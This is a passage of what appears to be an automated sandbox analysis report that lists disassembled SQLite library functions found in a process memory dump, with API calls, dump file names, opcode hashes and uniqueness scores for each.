                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_bind_doublesqlite3_bind_int64sqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1465616180-0
                                                                                              • Opcode ID: 2d2a39d10281f708c0e1ec976ef118b294a0351c426d972fe6f207272e830855
                                                                                              • Instruction ID: fa682a8eb3146af832897d044302f2186fc9111b08e29f8c24822f573dadceab
                                                                                              • Opcode Fuzzy Hash: 2d2a39d10281f708c0e1ec976ef118b294a0351c426d972fe6f207272e830855
                                                                                              • Instruction Fuzzy Hash: A2216BB05097049FDB04DF59D5E12AABBA0EF49324F24C55EE9A84B399D234C851CB82
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E25ADA Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E25AF4
                                                                                              • sqlite3_bind_zeroblob.SQLITE3 ref: 61E25B19
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E25B39
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_bind_zeroblobsqlite3_mutex_entersqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 2187339821-0
                                                                                              • Opcode ID: fd82d8118d1dfcef2dd3b4004b93fa4971c8d1c997404bfe920ad8ca7ffc9a3a
                                                                                              • Instruction ID: ec03841b387734964ccbedf90f9d5aeb2cba603dc61af0c45288c98f82bb6cb1
                                                                                              • Opcode Fuzzy Hash: fd82d8118d1dfcef2dd3b4004b93fa4971c8d1c997404bfe920ad8ca7ffc9a3a
                                                                                              • Instruction Fuzzy Hash: A2011A74A046198FCB00DF69D1D099ABBF5FF89764B24C459E848CB319D630E851CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E1088D Relevance: 3.1, APIs: 2, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E1081B
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E1087E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1477753154-0
                                                                                              • Opcode ID: a4b2aa46c381a1ef9dfd26f49fda6d4056484dfb049435801cf9db63e503566f
                                                                                              • Instruction ID: 8156f0c470814bf93e36f23237021f05c5915d2ca7ae2d6312204cd83d790a1e
                                                                                              • Opcode Fuzzy Hash: a4b2aa46c381a1ef9dfd26f49fda6d4056484dfb049435801cf9db63e503566f
                                                                                              • Instruction Fuzzy Hash: E0212D349082198FCB04DFA9C485BE9FBF0FF49314F1481A9E818AB396D775E995CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E1073D Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E10753
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E1079E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1477753154-0
                                                                                              • Opcode ID: 7f091bc1c669293594e63c1e131f4735b4e170d852591745cca0c848020f1c20
                                                                                              • Instruction ID: a0f6b3ecf074aa1c87f9110a581b2a43198f584670a2be514135643a6f6f2b01
                                                                                              • Opcode Fuzzy Hash: 7f091bc1c669293594e63c1e131f4735b4e170d852591745cca0c848020f1c20
                                                                                              • Instruction Fuzzy Hash: E501F9365086518BCB00AF65C4C1A99BBB4EF86324F19C16AEC588F34AD734D492CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E256C1 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 61E254EB: sqlite3_log.SQLITE3 ref: 61E25519
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E256A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1465156292-0
                                                                                              • Opcode ID: 70db542e2442cb87d82130d2572cea195df8602eecf264f30fa4d2e9f1950318
                                                                                              • Instruction ID: 043b1b158e7823502beb08aad275c8d825e1f2bfaf8fca04309f5db98610adc9
                                                                                              • Opcode Fuzzy Hash: 70db542e2442cb87d82130d2572cea195df8602eecf264f30fa4d2e9f1950318
                                                                                              • Instruction Fuzzy Hash: 84314C74A042498FCB10DFA9D9D0AEEBBF5FF89224F248169E818D7358D735D902CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E25909 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 61E254EB: sqlite3_log.SQLITE3 ref: 61E25519
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E25968
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1465156292-0
                                                                                              • Opcode ID: c835b0a2f1f48912d605254764211426dc0a56ddc91766a6e7e980621e609dc1
                                                                                              • Instruction ID: b0c63f8ad6c8981f87e3f6021f7123c8364c2557ddd5e567217499be5fc74aad
                                                                                              • Opcode Fuzzy Hash: c835b0a2f1f48912d605254764211426dc0a56ddc91766a6e7e980621e609dc1
                                                                                              • Instruction Fuzzy Hash: 8C112770A0430A8BCB04CF5AD5C059AFBA5FF89364F14862EE8589B305D334E991CBD5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E257EA Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 61E254EB: sqlite3_log.SQLITE3 ref: 61E25519
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E25845
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1465156292-0
                                                                                              • Opcode ID: 3e104ec75d1f05427d57e8b40a828d2f2a46eb096ee85bd5892d50d792460a8c
                                                                                              • Instruction ID: e0996da50883f3bd06b68f2ece9ddc8d9ac0e3b33faec24ee35ccf468bc1930a
                                                                                              • Opcode Fuzzy Hash: 3e104ec75d1f05427d57e8b40a828d2f2a46eb096ee85bd5892d50d792460a8c
                                                                                              • Instruction Fuzzy Hash: C1017C3570060A9BCB04ABA9D9D09EDFBB4FF89364F25C169E8049B308DBB4D855CB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E25986 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 61E254EB: sqlite3_log.SQLITE3 ref: 61E25519
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E259E4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1465156292-0
                                                                                              • Opcode ID: 986e6050ad27749a6cb0cb1f44111f146f7ca75fd7dc2c2223625e7d7e471bd7
                                                                                              • Instruction ID: 3cd8f2ae183f5c9c86376f09ae18081a3b57ab573096787a607dc1119f92b10d
                                                                                              • Opcode Fuzzy Hash: 986e6050ad27749a6cb0cb1f44111f146f7ca75fd7dc2c2223625e7d7e471bd7
                                                                                              • Instruction Fuzzy Hash: EF014B347003468BC700DF6AD580A8AFBA4FF89368F14C669D8188B305D375E991CFD0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E25863 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 61E254EB: sqlite3_log.SQLITE3 ref: 61E25519
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E258A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1465156292-0
                                                                                              • Opcode ID: a9697c151544da266bb117883734f60e90fa9259a565b897d89ff01c493d4291
                                                                                              • Instruction ID: 733b1a8a03f6054a2512c04a4fe2f15ce8012d452e94817838260a8fe352a867
                                                                                              • Opcode Fuzzy Hash: a9697c151544da266bb117883734f60e90fa9259a565b897d89ff01c493d4291
                                                                                              • Instruction Fuzzy Hash: 29F03A3970020A9B8B00DF6AD9C088EB7B9EF89264B14C065EC04DB305D230E952CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E258D8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 61E254EB: sqlite3_log.SQLITE3 ref: 61E25519
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E258FB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 1465156292-0
                                                                                              • Opcode ID: 38e8b1723f6024e78b6e25b91f353e5386eb6a44a4fddf66ef4c565f0f5707ff
                                                                                              • Instruction ID: 19f8239dd8711a4a0acf0fd3a4fccf0221f07ecae00af97cb0da44f84c7d4ca3
                                                                                              • Opcode Fuzzy Hash: 38e8b1723f6024e78b6e25b91f353e5386eb6a44a4fddf66ef4c565f0f5707ff
                                                                                              • Instruction Fuzzy Hash: 21E0EC74B087099BCB00DF69D9C094AF7B8EF89268F24C665DC598B309E331E995CB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E258B2 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_bind_int64.SQLITE3 ref: 61E258D1
                                                                                                • Part of subcall function 61E25863: sqlite3_mutex_leave.SQLITE3 ref: 61E258A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_bind_int64sqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 3064317574-0
                                                                                              • Opcode ID: ce01ef94e47e0f3b5e3022edffbc238ed3a861089da3a055ee794e226609d537
                                                                                              • Instruction ID: 241d337363a67a0b3fa0b171ae47325cf8f6c1a49923edc43b5dee8f5f9fbea6
                                                                                              • Opcode Fuzzy Hash: ce01ef94e47e0f3b5e3022edffbc238ed3a861089da3a055ee794e226609d537
                                                                                              • Instruction Fuzzy Hash: BBD092B4909309AFCB00EF69C58544EBBE4AF88254F40C82EFC98C7310E6B4E8408F92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E25756 Relevance: .0, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fe99dd488f8f8ad2b92952aec82dc289e8aab1b40138442d98c3cb0b9c02f0ee
                                                                                              • Instruction ID: 713113ab1f8dcbd7a2d66ba07bc89f046649da5e34a4f39ebb40b895256f4a46
                                                                                              • Opcode Fuzzy Hash: fe99dd488f8f8ad2b92952aec82dc289e8aab1b40138442d98c3cb0b9c02f0ee
                                                                                              • Instruction Fuzzy Hash: F7012875A0421D9BCF00CE4AD8916EEB7B5FB88364F64812AF91497341D235E9228BA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E256E8 Relevance: .0, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cf6c1bb4fe10067c7b947e7ee6005aa7af93a2e5c9633f12df9dfde0985a9788
                                                                                              • Instruction ID: 9cf38ed2faa6a2a49386cd8a6a90a656a6e624b1bf6a3f2341f4173cae871ab4
                                                                                              • Opcode Fuzzy Hash: cf6c1bb4fe10067c7b947e7ee6005aa7af93a2e5c9633f12df9dfde0985a9788
                                                                                              • Instruction Fuzzy Hash: 0FF03075648219DBDB04CE09E4A06DA77E8FB09374F20C12AFC1547344C671E951CBD0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E14411 Relevance: .0, Instructions: 24COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b401c3ba557441c53ca790dc11246036f0063ce4e6feaca526ad345b53246fed
                                                                                              • Instruction ID: c37322e30e8c9fe387c8a114e6781206eb98bf37d37bb6a7f409904599d50f3b
                                                                                              • Opcode Fuzzy Hash: b401c3ba557441c53ca790dc11246036f0063ce4e6feaca526ad345b53246fed
                                                                                              • Instruction Fuzzy Hash: 25E012763493095FBB40CD99ACC0A26779AFB8812CF74C136ED588B305D632DC164250
                                                                                              Uniqueness

